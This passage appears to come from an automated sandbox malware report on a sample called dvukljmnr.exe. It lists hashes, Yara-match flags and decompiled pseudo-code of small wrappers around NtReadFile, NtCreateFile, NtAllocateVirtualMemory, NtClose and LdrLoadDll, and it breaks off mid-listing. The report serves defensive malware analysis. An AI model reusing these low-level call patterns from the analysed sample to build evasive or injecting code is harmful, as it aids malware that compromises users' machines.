                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: __malloc_crt_malloc_wparse_cmdline
                                                          • String ID: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe
                                                          • API String ID: 197901045-1441584134
                                                          • Opcode ID: 1aec98f599be023b9ef007531b6da91313f0c09784e8d9e35e4d927862a697c4
                                                          • Instruction ID: 78e3c0c2fb494c55cc83f3b5c049f9327aeccdbff389aa7e0fd6c011314af9f5
                                                          • Opcode Fuzzy Hash: 1aec98f599be023b9ef007531b6da91313f0c09784e8d9e35e4d927862a697c4
                                                          • Instruction Fuzzy Hash: D9F09676904009ABCB08DFACD9A1CFEB3ACEA413747E006A7E526C3151EA3596618F61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E009A50DD(void* __eax, signed int* __esi) {
                                                          				void* _t4;
                                                          				signed int _t10;
                                                          				struct _CRITICAL_SECTION* _t12;
                                                          				signed int* _t13;
                                                          
                                                          				_t13 = __esi;
                                                          				_t4 = __eax;
                                                          				while(1) {
                                                          					_t13 =  &(_t13[1]);
                                                          					if(_t13 >= 0x9cf330) {
                                                          						break;
                                                          					}
                                                          					_t10 =  *_t13;
                                                          					if(_t10 != 0) {
                                                          						if(_t10 < _t10 + 0x800) {
                                                          							_t12 = _t10 + 0xc;
                                                          							do {
                                                          								if( *((intOrPtr*)(_t12 - 4)) != 0) {
                                                          									DeleteCriticalSection(_t12);
                                                          								}
                                                          								_t12 = _t12 + 0x40;
                                                          							} while (_t12 - 0xc <  *_t13 + 0x800);
                                                          						}
                                                          						_t4 = E009B2248( *_t13);
                                                          						 *_t13 =  *_t13 & 0x00000000;
                                                          					}
                                                          				}
                                                          				return _t4;
                                                          			}







                                                          APIs
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\dvukljmnr.exe, xrefs: 009B1061
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: CriticalDeleteSection_free
                                                          • String ID: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe
                                                          • API String ID: 1883507540-1441584134
                                                          • Opcode ID: d87785c3017b3014c40f969a645ac21821701722ed448140520681ad4c5e52d9
                                                          • Instruction ID: 23a35482d59bcd40922a57d0ed7d8301edaa49ca91ecab60d6d9527fd34fae4f
                                                          • Opcode Fuzzy Hash: d87785c3017b3014c40f969a645ac21821701722ed448140520681ad4c5e52d9
                                                          • Instruction Fuzzy Hash: 83F0657690004287D778BF04E9D07E8F3A6FB90371FA6493ED49697150DB3559C58A81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 41a3fb-41a449 call 41af50 NtReadFile
                                                          APIs
                                                          • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_dvukljmnr.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID: !JA$bMA$bMA
                                                          • API String ID: 2738559852-4222312340
                                                          • Opcode ID: bbedcce165141eae6f6c59c4a2154509f4d526a624f79bebf9a1775ec944f995
                                                          • Instruction ID: 49720b7d66a93349e3bd369c002c8e5e6a417abb72e5e273f09933de7181dcef
                                                          • Opcode Fuzzy Hash: bbedcce165141eae6f6c59c4a2154509f4d526a624f79bebf9a1775ec944f995
                                                          • Instruction Fuzzy Hash: E7F0F4B6200208AFCB14DF89CC91EEB77A9EF8C714F168259FE1D97241D630E811CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 3 41a400-41a416 4 41a41c-41a449 NtReadFile 3->4 5 41a417 call 41af50 3->5 5->4
                                                          C-Code - Quality: 37%
                                                          			E0041A400(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                                                          				void* _t18;
                                                          				void* _t27;
                                                          				intOrPtr* _t28;
                                                          
                                                          				_t13 = _a4;
                                                          				_t28 = _a4 + 0xc48;
                                                          				E0041AF50(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                          				_t4 =  &_a40; // 0x414a21
                                                          				_t6 =  &_a32; // 0x414d62
                                                          				_t12 =  &_a8; // 0x414d62
                                                          				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                                                          				return _t18;
                                                          			}






                                                          APIs
                                                          • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_dvukljmnr.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID: !JA$bMA$bMA
                                                          • API String ID: 2738559852-4222312340
                                                          • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                          • Instruction ID: 27817754ac388b25b847a3362b671b2e44b934df7eae6808a762aa4d31f9cf83
                                                          • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                          • Instruction Fuzzy Hash: 93F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 244 40ace0-40acfc 245 40ad04-40ad09 244->245 246 40acff call 41cc40 244->246 247 40ad0b-40ad0e 245->247 248 40ad0f-40ad1d call 41d060 245->248 246->245 251 40ad2d-40ad30 248->251 252 40ad1f-40ad2a call 41d2e0 248->252 254 40ad36-40ad3e 251->254 255 40ad31 call 41b490 251->255 252->251 257 40ad40-40ad54 LdrLoadDll 254->257 258 40ad57-40ad5a 254->258 255->254 257->258
                                                          C-Code - Quality: 70%
                                                          			E0040ACE0(void* __eflags, void* _a4, signed char _a8) {
                                                          				char* _v8;
                                                          				struct _EXCEPTION_RECORD _v12;
                                                          				struct _OBJDIR_INFORMATION _v16;
                                                          				char _v536;
                                                          				void* _t15;
                                                          				struct _OBJDIR_INFORMATION _t17;
                                                          				struct _OBJDIR_INFORMATION _t18;
                                                          				intOrPtr _t28;
                                                          				void* _t30;
                                                          				void* _t31;
                                                          				void* _t32;
                                                          
                                                          				_t24 = _a8;
                                                          				_v8 =  &_v536;
                                                          				_t15 = E0041CC40( &_v12, 0x104, _a8);
                                                          				_t31 = _t30 + 0xc;
                                                          				if(_t15 != 0) {
                                                          					_push(_v8);
                                                          					_t17 = E0041D060(_t24, __eflags);
                                                          					_t32 = _t31 + 4;
                                                          					__eflags = _t17;
                                                          					if(_t17 != 0) {
                                                          						E0041D2E0( &_v12, 0);
                                                          						_t32 = _t32 + 8;
                                                          					}
                                                          					_t28 = _v8;
                                                          					asm("cld");
                                                          					_t18 = E0041B490(_t28);
                                                          					_v16 = _t18;
                                                          					__eflags = _t18;
                                                          					if(_t18 == 0) {
                                                          						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                          						return _v16;
                                                          					}
                                                          					return _t18;
                                                          				} else {
                                                          					return _t15;
                                                          				}
                                                          			}














                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_dvukljmnr.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                          • Instruction ID: d499f532a4605d4acc668fd39ab8700ce4e6b27de0f8ef54b1fb0fb48fae0bb4
                                                          • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                          • Instruction Fuzzy Hash: EF0152B5D4020DA7DB10EBA5DC42FDEB3789F14308F0041A5E908A7281F634EB54CB95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 259 41a34a-41a3a1 call 41af50 NtCreateFile
                                                          C-Code - Quality: 64%
                                                          			E0041A34A(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                          				long _t21;
                                                          				void* _t31;
                                                          
                                                          				asm("popfd");
                                                          				asm("repe sbb byte [ebp-0x74aaa25a], 0xec");
                                                          				_t15 = _a4;
                                                          				_t3 = _t15 + 0xc40; // 0xc40
                                                          				E0041AF50(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                          				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                          				return _t21;
                                                          			}





                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_dvukljmnr.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 2a99a3c2f4766e3ff7701aeb918381754f39925105fc95cd78374fa7f9cf15e1
                                                          • Instruction ID: 5d37e0bc2e5497f3ba9e256379f8536d62525a8f8307c94596b62d97346bd883
                                                          • Opcode Fuzzy Hash: 2a99a3c2f4766e3ff7701aeb918381754f39925105fc95cd78374fa7f9cf15e1
                                                          • Instruction Fuzzy Hash: 5F01B2B2201108AFCB18CF99DC85EEB77A9AF8C754F15824CFA5D97291C630E851CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 262 41a350-41a366 263 41a36c-41a3a1 NtCreateFile 262->263 264 41a367 call 41af50 262->264 264->263
                                                          C-Code - Quality: 100%
                                                          			E0041A350(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                          				long _t21;
                                                          				void* _t31;
                                                          
                                                          				_t3 = _a4 + 0xc40; // 0xc40
                                                          				E0041AF50(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                          				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                          				return _t21;
                                                          			}





                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_dvukljmnr.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                          • Instruction ID: 880687b14e2bfdcefdfb108c829fe1d34a34742feba638e3287dae326a4d6923
                                                          • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                          • Instruction Fuzzy Hash: AAF0BDB2201208AFCB08CF89DC85EEB77ADAF8C754F158248BA1D97241C630E8518BA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          control_flow_graph 265 41a530-41a56d call 41af50 NtAllocateVirtualMemory
                                                          C-Code - Quality: 100%
                                                          			E0041A530(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                          				long _t14;
                                                          				void* _t21;
                                                          
                                                          				_t3 = _a4 + 0xc60; // 0xca0
                                                          				E0041AF50(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                          				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                          				return _t14;
                                                          			}






                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B124,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A569
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_dvukljmnr.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID:
                                                          • API String ID: 2167126740-0
                                                          • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                          • Instruction ID: 4e0f78fd3c2c10b6dba7ecb12144fed22081eaa1fb7babd41561f41a61d0d9a2
                                                          • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                          • Instruction Fuzzy Hash: A3F015B2200208AFCB14DF89CC81EEB77ADAF88754F118149BE1C97241C630F811CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          control_flow_graph 271 41a47b-41a4a9 call 41af50 NtClose
                                                          C-Code - Quality: 43%
                                                          			E0041A47B(intOrPtr _a8, void* _a12) {
                                                          				long _t8;
                                                          				void* _t11;
                                                          
                                                          				_pop(_t11);
                                                          				asm("popfd");
                                                          				asm("daa");
                                                          				asm("insd");
                                                          				asm("fcom qword [ebp-0x75]");
                                                          				_t5 = _a8;
                                                          				_t2 = _t5 + 0x10; // 0x300
                                                          				_t3 = _t5 + 0xc50; // 0x40a933
                                                          				E0041AF50(_t11, _a8, _t3,  *_t2, 0, 0x2c);
                                                          				_t8 = NtClose(_a12); // executed
                                                          				return _t8;
                                                          			}






                                                          APIs
                                                          • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_dvukljmnr.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: 96694a41f84103a2750570f19915e235cc2157ad943ab8566f94040f6eab9b6e
                                                          • Instruction ID: 224f3cab7641eba9fa5498746abd3f9922e224dbb1b3f46e5902b56a1c4f2db2
                                                          • Opcode Fuzzy Hash: 96694a41f84103a2750570f19915e235cc2157ad943ab8566f94040f6eab9b6e
                                                          • Instruction Fuzzy Hash: 04E08C75600200ABD720DFA9CC86EEB7B68EF84364F104199BA1DEB242C630A50186A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0041A480(intOrPtr _a4, void* _a8) {
                                                          				long _t8;
                                                          				void* _t11;
                                                          
                                                          				_t5 = _a4;
                                                          				_t2 = _t5 + 0x10; // 0x300
                                                          				_t3 = _t5 + 0xc50; // 0x40a933
                                                          				E0041AF50(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                          				_t8 = NtClose(_a8); // executed
                                                          				return _t8;
                                                          			}






                                                          APIs
                                                          • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_dvukljmnr.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                          • Instruction ID: 58703de6d0d09b45194c1a78dafb6a6614d70e6a8447524affba2eb7b0ba4c9c
                                                          • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                          • Instruction Fuzzy Hash: E9D01776200214ABD710EB99CC85EE77BACEF48764F154499BA1C9B242C530FA1086E4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                          • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                          • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                          • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                          • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                          • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                          • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                          • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                          • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                          • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                          • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                          • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                          • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                          • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                          • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                          • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                          • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                          • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                          • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp
